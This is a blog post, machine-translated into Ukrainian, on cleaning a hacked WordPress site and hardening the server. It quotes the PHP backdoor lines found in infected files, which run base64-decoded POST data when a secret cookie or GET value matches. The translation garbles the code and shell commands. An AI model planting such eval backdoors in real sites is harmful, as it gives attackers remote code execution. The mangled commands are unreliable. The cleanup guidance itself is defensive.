WordPress Exploit - Очищення файлів вірусу і безпечним сервером SQL.

Перш ніж читати цей пост, ви повинні побачити , Щось зрозуміти. :)

Ми виявили, що багато блоги на файли stealthsettings.com код, схожий з нижче, що виникають у зв'язку з virusarii з Використовувати WordPress.:

<? Php якщо ($ _ GET [ '573abcb060974771'] == "8e96d1b4b674e1d2") {Eval (base64_decode ($ _ POST [ 'файл'])); вихід; }?>

si

<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>

XMLRPCЯкщо вище про фото xmlrpc.php від сонний, У GREP сервер, схоже досить багато такого роду у вихідних кодах.

pppffiuuu

Очищення заражених файлів:

Ooookkkk ...
1. Краще рішення, як це робиться резервна копіяІ прибрали бази даних є витирати файли WordPress (ви можете зберігати wp-config.php та файли, які не суворо на платформі wp після того, як вони ретельно перевіряються) на сервері та завантажувати їх у вихідну версію 2.5.1 (З цього приводу і зробити версію оновлення WP :)) http://wordpress.org/download/ . Протріть включаючи файли теми, якщо ви не впевнені, що їх ретельної перевірки.

Це, здається, були порушені й файли з тим, що не були використані, перш ніж на блозі і просто змінити тему, не вирішує проблеми.

./andreea/wp-content/themes/default/index.php:<?php якщо ($ _ COOKIE ['44e827f9fbeca184'] == '5cd3c94b4b1c57ea ") {Eval (base64_decode ($ _ POST [' файл '])); вихід; ?}?> <Php get_header (); ?>

2. Пошук і видалення всіх файлів, що містять: ... _new.php *, * _old.php, Jpgg *, * Giff, * Pngg і WP-info.txt файл, якщо такі є.

Знайти. -Name "* _new.php"
Знайти. -Name "* _old.php"
Знайти. -Name "*. Jpgg"
Знайти. -Name "* _giff"
Знайти. -Name "* _pngg"
Знайти. -Name "WP-info.txt"

3. в / Tmp , Пошук і видалення папок, як tmpYwbzT2

Очищення SQL :

1. у таблиці Таблиця wp_options Перевірте і видаліть рядки: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.

2. У wp_options, перейдіть до active_plugins і видаліть, якщо є плагін, який закінчується в одному з розширень * _new.php, _old.php *, *. jpgg, *. Гіффен, *. pngg або якщо інший внутрішній підозрюють, уважніше перевіряйте.

3. У таблиці wp_users, Дивіться, якщо є користувач, який не вказав нічого в його правій, колонка user_nicename. Видалити користувача, але зверніть увагу на номер на ID колонку. Користувач може використовувати "WordPress", як user_login створений і відображається на 00: 00: 00 0000-00-00.

4. Підійдіть до столу wp_usermeta і видалити всі лінії, що належать ID вище.

Після того як ви зробили це SQL очищення, відключити, а потім включити певний плагін. (У блозі -> Панель управління -> Модулі)

Secure Server:

1. Подивіться, що файли і каталоги "запису"(CHMOD 777) і спробувати нанести на них CHMOD , Які не дозволяють їх написання на будь-якому рівні. (CHMOD 644, наприклад)

Знайти. -Перм-2-LS

2. Подивіться, що файли мають встановлений біт SUID або SGID . Якщо ви не використовуєте ці файли поклали на них CHMOD 0 або видалити пакет, який вона містить. Вони дуже небезпечні, тому що вони виконують привілеї "група"Або"корінь"Не з нормальними користувацькими привілеями для виконання цього файлу.

знайти / типу F-Перм-04000-LS
знайти / типу F-Перм-02000-LS

3. Перевірте, які порти відкриті і спробувати закрити або захистити ті, які не використовуються.

NetStat-| GREP-я слухаю

Так багато. Розумію Google Search і інші говорять: "Ну що вони зробили!". Ну а як ви зробили це ... Але ви знаєте, якщо Google почне заборонити всі сайти формування БУДЕ спамом і покласти троянів (Trojan.Clicker.HTML) в печиво?

WordPress Exploit - Очищення файлів вірусу і безпечним сервером SQL.

Про автора

Хитрість

Пристрасний про все, що гаджет і IT писати з задоволенням stealthsettings.com з 2006 і мені подобається відкривати нові речі з вами про комп'ютери та MacOS, Linux, Windows, прошивці і Android.

Додати коментар

Залишити коментар

Цей сайт використовує Akismet для зменшення спаму. Дізнайтеся, як обробляються ваші дані коментарів.